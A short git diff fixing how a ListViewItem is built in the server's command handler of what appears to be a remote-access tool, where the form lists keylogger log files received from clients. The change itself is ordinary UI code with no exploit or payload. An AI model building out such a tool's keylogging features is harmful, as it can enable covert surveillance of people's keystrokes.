diff --git a/Server/Core/Commands/CommandHandler.cs b/Server/Core/Commands/CommandHandler.cs index 136f0077..e92e05fb 100644 --- a/Server/Core/Commands/CommandHandler.cs +++ b/Server/Core/Commands/CommandHandler.cs @@ -347,8 +347,7 @@ public static void HandleGetLogsResponse(Client client, GetLogsResponse packet) var file1 = file; client.Value.FrmKl.Invoke((MethodInvoker)delegate { - client.Value.FrmKl.lstLogs.Items.Add(new ListViewItem().Text = file1.Name); - + client.Value.FrmKl.lstLogs.Items.Add(new ListViewItem() { Text = file1.Name }); }); }